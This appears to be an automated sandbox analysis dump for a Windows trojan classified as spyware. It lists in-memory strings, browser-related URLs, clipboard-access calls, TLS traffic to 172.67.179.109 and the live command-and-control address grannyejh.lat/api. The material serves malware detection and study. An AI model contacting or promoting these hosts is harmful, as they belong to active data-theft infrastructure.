                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: NHEXQatKdE.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: NHEXQatKdE.exe, 00000004.00000003.2718810987.0000000000F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: NHEXQatKdE.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                Source: NHEXQatKdE.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: NHEXQatKdE.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                Source: NHEXQatKdE.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: NHEXQatKdE.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                Source: NHEXQatKdE.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: NHEXQatKdE.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                Source: NHEXQatKdE.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                Source: NHEXQatKdE.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: NHEXQatKdE.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: NHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: NHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.serv
                Source: NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: NHEXQatKdE.exe, 00000004.00000003.2718890653.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640272191.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2718255542.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560537533.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560924415.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640792581.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
                Source: NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/4
                Source: NHEXQatKdE.exe, 00000004.00000003.2560537533.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/7
                Source: NHEXQatKdE.exe, 00000004.00000003.2718890653.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640272191.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2718255542.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640792581.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/E
                Source: NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/N
                Source: NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640272191.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2718255542.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640792581.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/c
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/d
                Source: NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/piN
                Source: NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/v
                Source: NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/z
                Source: NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                Source: NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api/
                Source: NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apiw
                Source: NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: NHEXQatKdE.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: NHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: NHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: NHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: NHEXQatKdE.exe, 00000004.00000003.2493650462.00000000034AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: NHEXQatKdE.exe, 00000004.00000003.2493650462.00000000034AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: NHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: NHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: NHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49836 version: TLS 1.2
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00431020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00431020
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00431020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00431020
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E123B0_2_006E123B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E24450_2_006E2445
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E10000_2_006E1000
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006E40E20_2_006E40E2
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EF0A00_2_006EF0A0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006F3D1E0_2_006F3D1E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 0_2_006EDAB20_2_006EDAB2
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E24453_2_006E2445
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E10003_2_006E1000
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E40E23_2_006E40E2
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EF0A03_2_006EF0A0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006F3D1E3_2_006F3D1E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006E123B3_2_006E123B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 3_2_006EDAB23_2_006EDAB2
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004209404_2_00420940
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004259F04_2_004259F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004369804_2_00436980
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004152114_2_00415211
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042BA224_2_0042BA22
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043E2804_2_0043E280
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004104BE4_2_004104BE
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004396604_2_00439660
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0040CE984_2_0040CE98
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004366B04_2_004366B0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0040D76F4_2_0040D76F
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042900A4_2_0042900A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004088104_2_00408810
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004110284_2_00411028
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043A0304_2_0043A030
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043C8DB4_2_0043C8DB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004090804_2_00409080
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0040A9304_2_0040A930
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004361304_2_00436130
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0040C93E4_2_0040C93E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042D1C44_2_0042D1C4
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004059D04_2_004059D0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043C9F04_2_0043C9F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004371804_2_00437180
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004039904_2_00403990
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042324C4_2_0042324C
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00426A524_2_00426A52
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00415A0E4_2_00415A0E
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041721A4_2_0041721A
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004062E04_2_004062E0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004192F04_2_004192F0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004252874_2_00425287
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00428A954_2_00428A95
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041CAB04_2_0041CAB0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004043404_2_00404340
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041BB404_2_0041BB40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004353584_2_00435358
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042AB004_2_0042AB00
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043CB204_2_0043CB20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042BA1D4_2_0042BA1D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00411B304_2_00411B30
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004233CA4_2_004233CA
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042CBE34_2_0042CBE3
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00439BF04_2_00439BF0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00417BFA4_2_00417BFA
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00437BA94_2_00437BA9
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00402BB04_2_00402BB0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043CBB04_2_0043CBB0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041FC504_2_0041FC50
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00404C704_2_00404C70
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041D4004_2_0041D400
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004374204_2_00437420
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00430C204_2_00430C20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041A4304_2_0041A430
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004214C04_2_004214C0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004094D04_2_004094D0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00414CF04_2_00414CF0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00421CAB4_2_00421CAB
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004075504_2_00407550
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042F5504_2_0042F550
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041655D4_2_0041655D
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041E5204_2_0041E520
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043DD204_2_0043DD20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0041CD904_2_0041CD90
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00426D934_2_00426D93
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00416DA54_2_00416DA5
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00425E404_2_00425E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00424E404_2_00424E40
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0040AE204_2_0040AE20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004236204_2_00423620
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00435ED04_2_00435ED0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042AE964_2_0042AE96
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004177584_2_00417758
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00402F604_2_00402F60
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004067704_2_00406770
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042577B4_2_0042577B
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00405F204_2_00405F20
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0042B7384_2_0042B738
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_004237904_2_00423790
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_0043DFA04_2_0043DFA0
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: String function: 004080E0 appears 49 times
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: String function: 006E2400 appears 66 times
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: String function: 004141A0 appears 64 times
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: String function: 006E7226 appears 36 times
                Source: NHEXQatKdE.exeStatic PE information: invalid certificate
                Source: NHEXQatKdE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: NHEXQatKdE.exeStatic PE information: Section: .bss ZLIB complexity 1.0003401131465517
                Source: NHEXQatKdE.exeStatic PE information: Section: .bss ZLIB complexity 1.0003401131465517
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@2/1
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeCode function: 4_2_00436980 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_00436980
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
